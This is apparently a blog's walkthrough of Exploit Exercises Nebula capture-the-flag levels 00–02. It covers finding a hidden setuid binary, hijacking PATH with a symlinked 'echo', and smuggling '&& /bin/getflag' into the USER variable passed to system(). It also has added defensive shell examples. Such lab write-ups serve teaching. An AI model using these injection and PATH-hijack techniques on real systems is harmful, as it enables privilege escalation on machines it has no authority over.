19 August 2012

Exploit.Exercise.com - Nebula - Level02

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level02 is similar to Level01 in that you don't need to know much about C++; you need to understand what is going on at the command line. You can see from the level02 code that it calls system() to run /bin/echo with the contents of the $USER variable. So, let's change the $USER variable so that the shell ends up running our getflag command as well.

There are 3 different ways to chain Linux commands together. I chose to use the double ampersand (&&), which runs the second command only if the first one succeeds.
$ USER="foo && /bin/getflag"
$ export USER
$ ./flag02
about to call system("/bin/echo foo && /bin/getflag is cool")
foo
You have successfully executed getflag on a target account

There you have it!

If you are still hazy on why that worked, try this at your command line.
$ echo test1 && echo test2 && echo test3
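As an added example (not part of the original post), the snippet below runs the same "echo" two ways: the way flag02 does it, where the value is spliced into one string and handed to system(), which is "sh -c", and the hardened way, where the value is passed as a single argument that no shell ever re-parses. The function names and the payload are mine; the payload is a constructed, harmless one whose injected command is only "echo INJECTED".

```shell
# Added example, not the level's code: the same "echo" run two ways.

# Mimics system("/bin/echo $USER is cool"): the value is spliced into a
# command line and the shell parses the result, so "&&" starts a new command.
echo_via_shell() {
    sh -c "echo $1 is cool"
}

# Hardened form: the value is one argument and printf formats it verbatim
# (printf rather than echo, so a value beginning with "-n" is not taken as an
# option either).  No shell ever sees the contents of the value.
echo_via_argv() {
    printf '%s is cool\n' "$1"
}

# Usage: printed_literally <value> <output>
# Returns 0 when <output> is exactly what a literal echo of <value> would give,
# i.e. nothing inside the value was executed.
printed_literally() {
    [ "$2" = "$1 is cool" ]
}

# Constructed payload: the second command is only "echo INJECTED".
payload='foo && echo INJECTED'
unsafe_out=$(echo_via_shell "$payload")
safe_out=$(echo_via_argv "$payload")

printf '%s\n' '--- via shell (one string, re-parsed) ---'
printf '%s\n' "$unsafe_out"
printf '%s\n' '--- via argv (value passed verbatim) ---'
printf '%s\n' "$safe_out"
```

The shell version prints "foo" and then "INJECTED is cool" as two separate lines, because the `&&` was parsed as an operator; the argv version prints the whole value, `&&` included, as plain text. That difference is the whole bug: the fix for a program like flag02 is to pass untrusted values as argv elements (execve-style) rather than building a command string for system().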

18 August 2012

Exploit.Exercise.com - Nebula - Level01

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

With level01 you don't need to know about programming in C++ as much as you need to know how Linux finds and runs binaries. So, read the blurb over at Wikipedia about the $PATH variable. The whole point of $PATH on Linux/Unix systems is that when a command needs to be executed, the system has to find where the binary lives, and $PATH lists the directories to look in, in order.

So, skimming through the source code shown on Nebula level01, you'll see that the program runs the echo command, which prints out "and what now?". But remember what you read at Wikipedia about the $PATH variable? The only way to deliberately execute a command from a specific location is to give its path explicitly (for example ./echo). As you can see from the source code, the echo command isn't being called by path. It is being found using the $PATH variable, and the first match in that search order is the one executed. What if there was another echo command somewhere else that we could point the $PATH variable to? Perhaps an echo command that we created...that ran the getflag binary for us :)

To do this, we create a symbolic link named echo (our own "echo command") that points to the target binary, /bin/getflag.

First, make sure we are in our home directory
$ cd ~
Now, create the symbolic link
$ ln -s /bin/getflag echo
Then export the updated $PATH so our directory is searched first.
$ export PATH=/home/level01:$PATH
Make sure it worked
$ echo $PATH
Finally, run flag01
$ /home/flag01/flag01
You have successfully executed getflag on a target account

13 August 2012

Exploit.Exercise.com - Nebula - Level00

I decided to try my hand at a war game over at Exploit Exercises. I figured it was a good way to keep my mind sharp. Before reading my spoilers you should give them a try yourself.

Level00 wants you to find a Set User ID program that is hidden in the filesystem. Level00 says that the SUID program runs as user 'flag00'.

The Linux find command works really well for this task.

The level00 documentation gives us two clues about the file. It is executable and it runs as the 'flag00' user. From looking at the man page, we know we can find files with those criteria.

Running this command
level00@nebula:~$ find / -user flag00 -executable -print
returns a bunch of permission errors.

So we run this to clean it up (sending the errors to /dev/null):
level00@nebula:~$ find / -user flag00 -executable -print 2> /dev/null
/home/flag00
/bin/.../flag00

Checking out /home/flag00 doesn't show anything interesting:
level00@nebula:~$ ls -la /home/flag00
total 20
drwxr-x---  2 flag00 level00 4096 2011-11-20 20:21 .
drwxr-xr-x 43 root   root    4096 2011-11-20 20:21 ..
-rw-r--r--  1 flag00 flag00   220 2011-05-18 02:54 .bash_logout
-rw-r--r--  1 flag00 flag00  3353 2011-05-18 02:54 .bashrc
-rw-r--r--  1 flag00 flag00   675 2011-05-18 02:54 .profile

Let's check out the other result:
level00@nebula:~$ ls -la /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00

There we go: it's executable, and the s in -rwsr-x--- shows the setuid bit is set, so it runs as flag00. Let's try it out.
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!

And finally we get what we came for...
level00@nebula:~$ getflag
You have successfully executed getflag on a target account
level00@nebula:~$
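As an added example (not part of the original post), the functions below do the defender's version of what level00 asks for: enumerate setuid files under a directory and check a mode string for the setuid bit. The level's own `find / -user flag00 -executable` lists every executable that flag00 owns; `-perm -4000` narrows that to files that actually carry the setuid bit, the s in the -rwsr-x--- mode shown above, which is what makes a program run as its owner rather than as the caller. The function names are mine; find(1), ls(1) and cut(1) are used as documented in POSIX.

```shell
# Added example, not the level's code: a small setuid audit.

# Usage: find_suid <root-dir> [owner]
# Prints every regular file under <root-dir> with the setuid bit set,
# optionally restricted to files owned by <owner> (a name or numeric uid).
# Permission errors on unreadable directories are discarded, as on the page.
find_suid() {
    if [ -n "$2" ]; then
        find "$1" -type f -perm -4000 -user "$2" -print 2>/dev/null
    else
        find "$1" -type f -perm -4000 -print 2>/dev/null
    fi
}

# Usage: mode_has_setuid <mode-string such as -rwsr-x--->
# Returns 0 if the fourth character is 's' (setuid + owner-execute) or
# 'S' (setuid without owner-execute), the way ls(1) shows the bit.
mode_has_setuid() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *) return 1 ;;
    esac
}

# Usage: has_setuid_bit <file>
# Same check against a real file, via the first ten characters of ls -ld.
has_setuid_bit() {
    mode_has_setuid "$(ls -ld "$1" | cut -c1-10)"
}

# Usage: count_suid <root-dir> [owner]
# Number of setuid files found; a figure worth recording and diffing over
# time, since a new setuid binary in an odd place (like /bin/...) is a red flag.
count_suid() {
    find_suid "$1" "$2" | wc -l | tr -d ' '
}

# Stand-alone demo: the setuid binaries the running system ships in /usr/bin.
printf '%s setuid files under /usr/bin\n' "$(count_suid /usr/bin)"
find_suid /usr/bin
```

On a real host, `find_suid /` run from a baseline and again later is the simplest way to notice a planted setuid binary; the hidden directory name /bin/... used by this level is exactly the kind of entry that stands out in such a diff.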